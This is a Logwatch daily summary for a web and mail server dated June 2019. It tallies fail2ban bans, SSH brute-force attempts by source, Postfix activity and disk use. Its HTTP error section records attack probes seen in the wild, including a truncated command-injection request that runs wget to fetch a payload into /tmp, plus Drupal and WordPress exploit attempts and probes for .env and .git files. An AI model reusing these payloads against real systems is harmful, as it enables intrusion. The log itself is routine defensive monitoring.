################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Thu Jun 6 04:42:08 2019
Date Range Processed: yesterday
( 2019-Jun-05 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [298:302]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 1 sites probed the server
176.58.124.134
Requests with error response codes
400 Bad Request
/: 1 Time(s)
/api/v1: 1 Time(s)
/login.cgi?cli=aa%20aa%27;wget%20http://19 ... h%20/tmp/kh%27$: 1 Time(s)
/robots.txt: 1 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
HTTP/1.1: 1 Time(s)
mstshash=Administr: 1 Time(s)
null: 1 Time(s)
404 Not Found
/robots.txt: 33 Time(s)
/berlin/apple-touch-icon.png: 4 Time(s)
/wp-login.php: 3 Time(s)
/,81.169.150.252: 1 Time(s)
/.env: 1 Time(s)
/.git/config: 1 Time(s)
/admin/: 1 Time(s)
/ads.txt: 1 Time(s)
/home/verein: 1 Time(s)
/protokolle/ergebnisprotokoll_mv_09.06.2017.pdf: 1 Time(s)
/reader/2016_sose_konstanz_lang.pdf: 1 Time(s)
500 Internal Server Error
/: 21 Time(s)
//user/register/?element_parents=account/m ... mat=drupal_ajax: 2 Time(s)
//webconfig.txt.php: 2 Time(s)
/.git/: 1 Time(s)
//administrator//webconfig.txt.php: 1 Time(s)
//wp-admin/admin-post.php?swp_debug=load_o ... 20%22h1loo1%22;: 1 Time(s)
/api/v1: 1 Time(s)
/bremen/2014/indexeb91.html%253Fp=207: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
unknown (ks41.johan-chan.fr): 62 Time(s)
unknown (120-88-46-226.snat21.hns.net.in): 54 Time(s)
unknown (139.59.7.5): 51 Time(s)
unknown (52.166.196.196): 51 Time(s)
unknown (61.ip-176-31-191.eu): 50 Time(s)
unknown (111.231.215.244): 48 Time(s)
unknown (186.84.172.62): 48 Time(s)
unknown (vps2.d3soft.ma): 48 Time(s)
unknown (103.9.88.242): 46 Time(s)
unknown (37.ip-51-68-143.eu): 46 Time(s)
unknown (198.211.125.131): 42 Time(s)
unknown (46.105.227.206): 42 Time(s)
unknown (106.12.98.12): 40 Time(s)
unknown (142.93.22.180): 39 Time(s)
unknown (128.199.104.232): 37 Time(s)
unknown (117.121.38.246): 36 Time(s)
unknown (49.247.207.56): 36 Time(s)
unknown (68.183.21.151): 34 Time(s)
unknown (103.9.88.249): 32 Time(s)
unknown (106.12.199.98): 27 Time(s)
unknown (host81-130-149-101.in-addr.btopenworld.com): 23 Time(s)
unknown (209.97.164.36): 18 Time(s)
unknown (ip125.ip-54-38-5.eu): 17 Time(s)
unknown (221.156.116.51): 12 Time(s)
unknown (39.red-213-97-245.staticip.rima-tde.net): 8 Time(s)
root (103.77.229.93): 6 Time(s)
root (115.58.70.88): 6 Time(s)
root (n119237104109.netvigator.com): 6 Time(s)
unknown (host-31-6-136-153.dynamic.mm.pl): 6 Time(s)
unknown (ns3077451.ip-188-165-242.eu): 6 Time(s)
unknown (159.89.100.35): 5 Time(s)
backup (37.ip-51-68-143.eu): 2 Time(s)
unknown (193.32.163.89): 2 Time(s)
www-data (46.105.227.206): 2 Time(s)
backup (186.84.172.62): 1 Time(s)
backup (39.red-213-97-245.staticip.rima-tde.net): 1 Time(s)
games (49.247.207.56): 1 Time(s)
gnats (37.ip-51-68-143.eu): 1 Time(s)
irc (186.84.172.62): 1 Time(s)
list (68.183.21.151): 1 Time(s)
mail (142.93.22.180): 1 Time(s)
man (37.ip-51-68-143.eu): 1 Time(s)
mysql (117.121.38.246): 1 Time(s)
mysql (49.247.207.56): 1 Time(s)
postfix (103.9.88.242): 1 Time(s)
postfix (117.121.38.246): 1 Time(s)
postfix (186.84.172.62): 1 Time(s)
postfix (ks41.johan-chan.fr): 1 Time(s)
postgres (120-88-46-226.snat21.hns.net.in): 1 Time(s)
proxy (186.84.172.62): 1 Time(s)
root (103.9.88.242): 1 Time(s)
root (218.92.0.154): 1 Time(s)
smmsp (52.166.196.196): 1 Time(s)
sshd (117.121.38.246): 1 Time(s)
sshd (ks41.johan-chan.fr): 1 Time(s)
sync (139.59.7.5): 1 Time(s)
sync (52.166.196.196): 1 Time(s)
temp (117.121.38.246): 1 Time(s)
unknown (138.68.171.54): 1 Time(s)
unknown (178.128.79.169): 1 Time(s)
unknown (194.179.101.4): 1 Time(s)
unknown (211.38.244.205): 1 Time(s)
unknown (215.ip-51-255-174.eu): 1 Time(s)
unknown (244.ip-164-132-230.eu): 1 Time(s)
unknown (41.210.9.30): 1 Time(s)
unknown (72.49.25.1): 1 Time(s)
unknown (74.208.239.79): 1 Time(s)
uucp (198.211.125.131): 1 Time(s)
www-data (103.9.88.249): 1 Time(s)
Invalid Users:
Unknown Account: 975 Time(s)
systemd-user:
Unknown Entries:
session closed for user root: 1 Time(s)
session opened for user root by (uid=0): 1 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
6 Miscellaneous warnings
13.383K Bytes accepted 13,704
13.383K Bytes sent via SMTP 13,704
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
7 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
7 Total 4xx Rejects 100.00%
======== ==================================================
127 Connections
112 Connections lost (inbound)
127 Disconnections
1 Removed from queue
1 Sent via SMTP
2 SMTP dialog errors
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 3 Time(s)
Failed logins from:
37.187.0.223 (ks41.johan-chan.fr): 2 times
46.105.227.206: 2 times
49.247.207.56: 2 times
51.68.143.37 (37.ip-51-68-143.eu): 4 times
52.166.196.196: 2 times
68.183.21.151: 1 time
103.9.88.242: 2 times
103.9.88.249: 1 time
103.77.229.93: 6 times
115.58.70.88 (hn.kd.ny.adsl): 6 times
117.121.38.246: 4 times
119.237.104.109 (n119237104109.netvigator.com): 6 times
120.88.46.226 (120-88-46-226.snat21.hns.net.in): 1 time
139.59.7.5: 1 time
142.93.22.180: 1 time
186.84.172.62 (dynamic-ip-1868417262.cable.net.co): 4 times
198.211.125.131: 1 time
213.97.245.39 (39.red-213-97-245.staticip.rima-tde.net): 1 time
218.92.0.154: 1 time
Illegal users from:
undef: 742 times
31.6.136.153 (host-31-6-136-153.dynamic.mm.pl): 6 times
37.187.0.223 (ks41.johan-chan.fr): 62 times
41.210.9.30 (adsl930.4u.com.gh): 1 time
46.105.227.206: 42 times
49.247.207.56: 36 times
51.68.143.37 (37.ip-51-68-143.eu): 46 times
51.255.174.215 (215.ip-51-255-174.eu): 1 time
52.166.196.196: 51 times
54.38.5.125 (ip125.ip-54-38-5.eu): 17 times
68.183.21.151: 34 times
72.49.25.1 (fl1-dsl-72-49-25-1.fuse.net): 1 time
74.208.239.79: 1 time
81.130.149.101 (host81-130-149-101.in-addr.btopenworld.com): 23 times
103.9.88.242: 46 times
103.9.88.249: 32 times
106.12.98.12: 40 times
106.12.199.98: 27 times
111.231.215.244: 48 times
117.121.38.246: 36 times
120.88.46.226 (120-88-46-226.snat21.hns.net.in): 54 times
128.199.104.232: 37 times
138.68.171.54: 1 time
139.59.7.5: 51 times
142.93.22.180: 39 times
159.89.100.35: 5 times
164.132.230.244 (244.ip-164-132-230.eu): 1 time
176.31.191.61 (61.ip-176-31-191.eu): 50 times
178.33.67.12 (vps2.d3soft.ma): 48 times
178.128.79.169: 1 time
186.84.172.62 (dynamic-ip-1868417262.cable.net.co): 48 times
188.165.242.200 (ns3077451.ip-188-165-242.eu): 6 times
193.32.163.89 (srv.eqaltech.su): 2 times
194.179.101.4 (4.red-194-179-101.customer.static.ccgg.telefonica.net): 1 time
198.211.125.131: 42 times
209.97.164.36: 18 times
211.38.244.205: 1 time
213.97.245.39 (39.red-213-97-245.staticip.rima-tde.net): 8 times
221.156.116.51: 12 times
Users logging in through sshd:
root:
176.94.82.115 (business-176-094-082-115.static.arcor-ip.net): 1 time
**Unmatched Entries**
Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (user,ssh-connection) [preauth] : 1 time(s)
fatal: no matching cipher found: client aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,twofish-cbc,arcfour server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/vzfs 400G 241G 160G 61% /
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################